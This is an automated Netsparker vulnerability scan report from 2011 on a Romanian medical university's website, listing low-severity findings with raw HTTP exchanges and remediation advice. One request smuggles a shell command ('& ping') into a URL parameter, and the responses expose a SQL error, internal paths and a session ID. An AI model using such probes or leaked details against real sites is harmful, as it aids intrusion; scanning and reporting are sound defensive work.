<ul> <li class="active"><a class="active" href="#">Informations pour</a> <ul> <li class=""><a class="" href="/lista.aspx?t=Admitere-Prezentare" onclick="document.location.href='/lista.aspx?t=Admitere-Prezentare'"><span class="dN">Dans la section </span>Admission<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/lista.aspx?t=Rectorat-Prezentare" onclick="document.location.href='/lista.aspx?t=Rectorat-Prezentare'">La présentation de l’ Université</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Admitere-2011" onclick="document.location.href='/Detaliu.aspx?t=Admitere-2011'">Candidatures pour 2011</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Studenti-actuali-Prezentare" onclick="document.location.href='/lista.aspx?t=Studenti-actuali-Prezentare'"><span class="dN">Dans la section </span>Étudiants<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/lista.aspx?t=Studenti-actuali-Prezentare" onclick="document.location.href='/lista.aspx?t=Studenti-actuali-Prezentare'">L'offre d'enseignement</a> <ul class="dN"> </ul> </li> <li class="active"><a class="active" href="#" onclick="document.location.href='#'">Informations pour les étudiants</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Organizatii-studentesti" onclick="document.location.href='/lista.aspx?t=Organizatii-studentesti'">Organisations estudiantines</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Masterat-Prezentare" onclick="document.location.href='/lista.aspx?t=Masterat-Prezentare'"><span class="dN">Dans la section </span>Masterat<span class="dN">:</span></a> <ul class=""> <li class="active"><a class="active" href="#" onclick="document.location.href='#'">Coordonnés</a> <ul class="dN"> </ul> </li> <li class="active"><a class="active" href="#" onclick="document.location.href='#'">Informations pour les masterants</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=RezidentiatPrezentare" onclick="document.location.href='/lista.aspx?t=RezidentiatPrezentare'"><span class="dN">Dans la section </span>Résidentiat<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=RezidentiatDatedecontact" onclick="document.location.href='/Detaliu.aspx?t=RezidentiatDatedecontact'">Coordonnés</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Rezidentiat-informatii" onclick="document.location.href='/Detaliu.aspx?t=Rezidentiat-informatii'">Informations concernant le résidentiat</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Doctorat-Prezentare" onclick="document.location.href='/lista.aspx?t=Doctorat-Prezentare'"><span class="dN">Dans la section </span>Doctorat<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Date-de-contact" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Date-de-contact'">Présentation</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Organizarea-Scolii-Doctorale" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Organizarea-Scolii-Doctorale'">Organisation de l'École Doctorale</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Functionarea-Scolii-Doctorale" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Functionarea-Scolii-Doctorale'">Fonctionnement de l'École Doctorale</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=DoctoratBiroudeConsiliereCariera" onclick="document.location.href='/lista.aspx?t=DoctoratBiroudeConsiliereCariera'">Département orientation professionnelle</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Studii-posuniversitare-Prezentare" onclick="document.location.href='/lista.aspx?t=Studii-posuniversitare-Prezentare'"><span class="dN">Dans la section </span>Cours post-universitaires <span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=Studii-posuniversitare-Date-de-contact" onclick="document.location.href='/Detaliu.aspx?t=Studii-posuniversitare-Date-de-contact'">Coordonnés</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Studii-posuniversitare-Informatii-pentru-studii-postuniversitare" onclick="document.location.href='/Detaliu.aspx?t=Studii-posuniversitare-Informatii-pentru-studii-postuniversitare'">Informations concernant les études post-universitaires</a> <ul class="dN"> </ul> </li> </ul> </li> </ul> </li> <li class="active"><a class="active" href="#">Informations sur</a> <ul> <li class=""><a class="" href="/lista.aspx?t=Universitare-Prezentare" onclick="document.location.href='/lista.aspx?t=Universitare-Prezentare'"><span class="dN">Dans la section </span>Université <span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/lista.aspx?t=Rectorat-Prezentare" onclick="document.location.href='/lista.aspx?t=Rectorat-Prezentare'">Rectorat</a> <ul class="dN"> <li class="active"><a class="active" href="/Detaliu.aspx?t=Rectorat-Prezentare&eID=62&c=0&m=0&y=0" onclick="document.location.href='/Detaliu.aspx?t=Rectorat-Prezentare&eID=62&c=0&m=0&y=0'">Propos du Recteur</a></li> <l..
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly
1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /en

/en CONFIRMED

http://umfcluj.ro/en

Identified Cookie

Products

Request

HEAD /en HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept: netsparker/check
Cache-Control: no-cache
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39906
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: Products=; expires=Mon, 18-Jul-2011 17:14:28 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:14:28 GMT


ASP.NET Version Disclosure

ASP.NET Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is disclosing ASP.NET version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks. It was leaked from X-AspNet-Version banner of HTTP response or default ASP.NET error page.

Impact

An attacker can use disclosed information to harvest specific security vulnerabilities for the version identified. The attacker can also use this information in conjunction with the other vulnerabilities in the application or web server.

Remedy

Apply the following changes on your web.config file to prevent information leakage by using custom error pages and removing X-AspNet-Version from HTTP responses. 
<System.Web>
     < httpRuntime enableVersionHeader="false" /> 
     <customErrors mode="On" defaultRedirect="~/error/GeneralError.aspx">
          <error statusCode="403" redirect="~/error/Forbidden.aspx" />
          <error statusCode="404" redirect="~/error/PageNotFound.aspx" />
          <error statusCode="500" redirect="~/error/InternalError.aspx" />
     </customErrors>
</System.Web>

Remedy References

- /en

/en

http://umfcluj.ro/en

Extracted Version

2.0.50727

Request

HEAD /en HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept: netsparker/check
Cache-Control: no-cache
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39906
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: Products=; expires=Mon, 18-Jul-2011 17:14:28 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:14:28 GMT


Database Error Message

Database Error Message
1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
- /lista.aspx

/lista.aspx

http://umfcluj.ro/lista.aspx?t=%27%26%20ping%20-n%2026%20127.0.0.1%20%26

Parameters

Parameter Type Value
t GET '& ping -n 26 127.0.0.1 &

Request

GET /lista.aspx?t=%27%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: http://umfcluj.ro/en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:17:23 GMT
Content-Length: 7028


<html>
<head>
<title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '26 127.0.0.1 &amp;'<br> LEFT OUTER JOIN g_categories c<br> ON cr.CategoryID = c.ID<br> LEFT ' at line 6</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '26 127.0.0.1 &amp;'<br> LEFT OUTER JOIN g_categories c<br> ON cr.CategoryID = c.ID<br> LEFT ' at line 6</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '26 127.0.0.1 &amp;'<br> LEFT OUTER JOIN g_categories c<br> ON cr.CategoryID = c.ID<br> LEFT ' at line 6<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '26 127.0.0.1 &amp;' LEFT OUTER JOIN g_categories c ON cr.CategoryID = c.ID LEFT ' at line 6]
Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteListDS(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:127
Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteList(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale, Int32&amp; Total) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:237
List.PopulateControl() +297
List.Page_Load(Object sender, EventArgs e) +121
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.4214; ASP.NET Version:2.0.50727.4209

</font>

</body>
</html>
<!--
[Exception]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '26 127.0.0.1 &amp;' LEFT OUTER JOIN g_categories c ON cr.CategoryID = c.ID LEFT ' at line 6
at Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteListDS(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:line 127
at Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteList(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale, Int32& Total) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:line 237
at List.PopulateControl()
at List.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type 'System.Web.HttpUnhandledException' was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.lista_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_lista.aspx.cdcab7d2.x3pnas7k.0.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
ASP.NET Stack Trace Disclosure

ASP.NET Stack Trace Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is disclosing ASP.NET stack trace data in the HTTP response.

Impact

An attacker can obtain information such as:
  • ASP.NET version.
  • Physical file path of Temporary ASP.NET Files
  • Information about the generated exception and possibly source code, SQL queries, etc.
This information can help an attacker to gain more information and to potentially focus the development of further attacks for the target system.

Remedy

Apply following changes on your web.config file to prevent information leakage by applying custom error pages. 
<System.Web>
     <customErrors mode="On" defaultRedirect="~/error/GeneralError.aspx">
          <error statusCode="403" redirect="~/error/Forbidden.aspx" />
          <error statusCode="404" redirect="~/error/PageNotFound.aspx" />
          <error statusCode="500" redirect="~/error/InternalError.aspx" />
     </customErrors>
</System.Web>

Remedy References

- /newsletter.aspx

/newsletter.aspx

http://umfcluj.ro/newsletter.aspx?newEmail=

Request

POST /newsletter.aspx?newEmail= HTTP/1.1
Referer: http://umfcluj.ro/newsletter.aspx?newEmail=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Content-Length: 308
Accept-Encoding: gzip, deflate

__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWBQLBopjuAQLhw6AyAuzu3YUFArGcpLcEAv%2ffrr4K&__SCROLLPOSITIONX=0&__SCROLLPOSITIONY=0&__VIEWSTATE=%2fwEPDwUKLTQzODg5NzM4Nw9kFgJmD2QWAgICD2QWAgIID2QWBAIDDxYCHgdWaXNpYmxlaGQCBQ8WAh8AaGRk&ctl00$cpBody$txEmail=&ctl00$hAction=&ctl00$txName=&ctl00$txNewsletter=

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:15:50 GMT
Content-Length: 5486


<html>
<head>
<title>The parameter 'address' cannot be an empty string.<br>Parameter name: address</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>The parameter 'address' cannot be an empty string.<br>Parameter name: address</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.ArgumentException: The parameter 'address' cannot be an empty string.<br>Parameter name: address<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[ArgumentException: The parameter 'address' cannot be an empty string.
Parameter name: address]
System.Net.Mail.MailAddress..ctor(String address, String displayName, Encoding displayNameEncoding) +1107953
System.Net.Mail.MailAddress..ctor(String address) +8
Netlogiq.Web.Newsletter.SaveSubscriber() +864
Netlogiq.Web.Newsletter.Page_Load(Object sender, EventArgs e) +199
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.4214; ASP.NET Version:2.0.50727.4209

</font>

</body>
</html>
<!--
[ArgumentException]: The parameter 'address' cannot be an empty string.
Parameter name: address
at System.Net.Mail.MailAddress..ctor(String address, String displayName, Encoding displayNameEncoding)
at System.Net.Mail.MailAddress..ctor(String address)
at Netlogiq.Web.Newsletter.SaveSubscriber()
at Netlogiq.Web.Newsletter.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type 'System.Web.HttpUnhandledException' was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.newsletter_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_newsletter.aspx.cdcab7d2.0tgu9kdk.0.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
ViewState is not Encrypted

ViewState is not Encrypted
1 TOTAL
LOW
Netsparker identified that the target web application doesn't use encryption on ViewState data.

Impact

An attacker can study the application's state management logic for possible vulnerabilities and if your application stores application-critical information in the ViewState; it will also be revealed.

Remedy

ASP.NET provides encryption for ViewState parameters.

For page based protection, place the following directive at the top of affected page. 
<%@Page ViewStateEncryptionMode="Always" %>
You can also set this option for the whole application by using web.config files. Apply the following configuration for your application's web.config file. 
<System.Web>
	<pages viewStateEncryptionMode="Always"> 
</System.Web>

Remedy References

- /en

/en

http://umfcluj.ro/en

ViewState Version

.NET Framework 2.x

Request

GET /en HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: umfcluj.ro
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=3r3mzz45lurz0df0glsnhy45; path=/; HttpOnly,Products=; expires=Mon, 18-Jul-2011 17:14:27 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:14:28 GMT
Content-Length: 39906



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>[en]umf</title>
<meta name="description" content="[en]Donec condimentum vestibulum libero. Praesent tellus. Donec lacinia aliquam mi. Suspendisse venenatis lobortis pede? Quisque quis ipsum. Vestibulum suscipit augue in elit rhoncus luctus. Vestibulum rutrum leo at purus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam ultrices. Nullam quam odio, accumsan quis, ultricies quis, venenatis at, justo. Integer posuere fringilla ipsum. Proin non pede ut metus tempor iaculis. Etiam velit quam, adipiscing eu, consectetur ut, commodo ut; erat. Duis porta. Praesent ullamcorper suscipit quam. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum vulputate.
" />
<meta name="keywords" content="[en]Curabitur orci enim; gravida vitae, interdum at, consequat eget, lorem? Suspendisse bibendum pellentesque elit. Duis in metus. Integer urna ante, scelerisque ut, ultricies sit amet, aliquet at, lorem? Sed nec orci! Donec lobortis nisi at nulla. In hac habitasse platea dictumst. Morbi sit amet nisi a felis dapibus pretium. Donec ipsum diam, eleifend quis; vestibulum nec, fermentum ac, urna. Etiam sem tortor, hendrerit auctor, sagittis id, iaculis id, est. Suspendisse vel arcu eu arcu auctor sodales. Praesent quis elit in purus mattis mollis.
" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link type="text/css" rel="stylesheet" href="/css/common.css" /><link type="text/css" rel="stylesheet" href="/css/paging.css" /><link type="text/css" rel="stylesheet" href="/css/simplemodal.css" /><link type="text/css" rel="stylesheet" href="/css/thickbox.css" /><link type="text/css" rel="stylesheet" href="/css/search.css" /> <script type="text/javascript" src="/js/search.js"></script> <script type="text/javascript" src="/js/jquery.js"></script>
<script type="text/javascript" src="/js/jquery-ui.js"></script>
<script type="text/javascript" src="/js/jquery.hoverIntent.js"></script>
<script type="text/javascript" src="/js/jquery.emptyOnFocus.js"></script>
<script type="text/javascript" src="/js/jquery.alphanumeric.js"></script>
<script type="text/javascript" src="/js/jquery.simplemodal.js"></script>
<script type="text/javascript" src="/js/jquery.validate.js"></script>
<script type="text/javascript" src="/js/jquery.thickbox.js"></script>
<script type="text/javascript" src="/js/common.js"></script>
<script type="text/javascript" src="/js/globalizationen-GB.js"></script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>


<title>

</title></head>
<body class="en-GB" id="home">
<form name="aspnetForm" method="post" action="default.aspx?lang=en" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYyNzU5NzVkZA==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=PsRJDDMJscQZi9Ce6WIaqNcJm9qD4oZbuj0e0cvS49Oclg_D1D9Ia36SFWSTU_w_z5Hn_JRB35Zoryx_6ILPzzT48KU1&amp;t=634210472612724343" type="text/javascript"></script>

<div>

<input type="hidden" name="__SCROLLPOSITIONX" id="__SCROLLPOSITIONX" value="0" />
<input type="hidden" name="__SCROLLPOSITIONY" id="__SCROLLPOSITIONY" value="0" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBALrxpOvAgLhw6AyAuzu3YUFAv/frr4K" />
</div>
<input type="hidden" id="hCulture" value="en-GB" />

<div id="headerAll">

<div id="header" class="easyclear">
<div id="ctl00_logo"><a href="/">UMF</a></div>



<div id="lang">
<ul>

<li><a class="fr-FR " href="/fr"><label>Francais</label><span></span></a></li>



<li><a class="en-GB active" href="/en"><label>English</label><span></span></a></li>



<li><a class="ro-RO " href="/ro"><label>Romana</label><span></span></a></li>



</ul>
</div>


<div>
<fieldset id="search">
<!--<legend>Cauta produse</legend>-->
<label for="ctl00_txSearch">Search in site</label>
<input id="txSearch" class="txSearch" type="text" onkeyup="searchOnEnter(event);" />
<input id="searchSubmit" class="button" type="button" onclick="doSearch();" />
</fieldset>
</div>

<div id="aboutNav">

<ul> <li class="active"><a class="active" href="/">Home page</a> <ul> </ul> </li> <li class=""><a class="" href="/sitemap.aspx">Sitemap</a> <ul> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Harta-Digitala">Digital Map</a> <ul> </ul> </li> </ul>
<hr />
</div>



<!--<div id="userNav">

<ul>
<li><a href="/Inregistrare.aspx">Sign up</a></li>
<li><a href="/Autentificare.aspx">Login</a></li>
</ul>

</div>-->



<!--<div id="inlineCartBar">
<div class="finalizeOrderDiv"><a class="finalizeOrder" href="/finalizareComanda.aspx">Checkout</a></div>
<div id="inlineCartWrapper">
<a id="showInlineCart" href="#inlineCartDetails">View cart</a>
<div id="inlineCart">
<ul><li></li></ul>
<div class="total easyclear">
<span>Total</span>
<strong></strong>
</div>
<div id="noProducts">There is no product in your cart</div>
<div id="buyButtons"></div>
<div class="hideBorder"></div>
</div>
</div>
<h4 class="noProducts">There is no product in your cart</h4> <span class="produseInCos"></span>
</div>-->



</div>

</div>
<!--<div id="wrapOuter">
<div class="tr">
<div class="bl">
<div class="br">-->
<div id="wrap" class="easyclear">



<!--<div id="breadcrumbs"></div>-->


<div id="leftSide">
<div id="tabs">
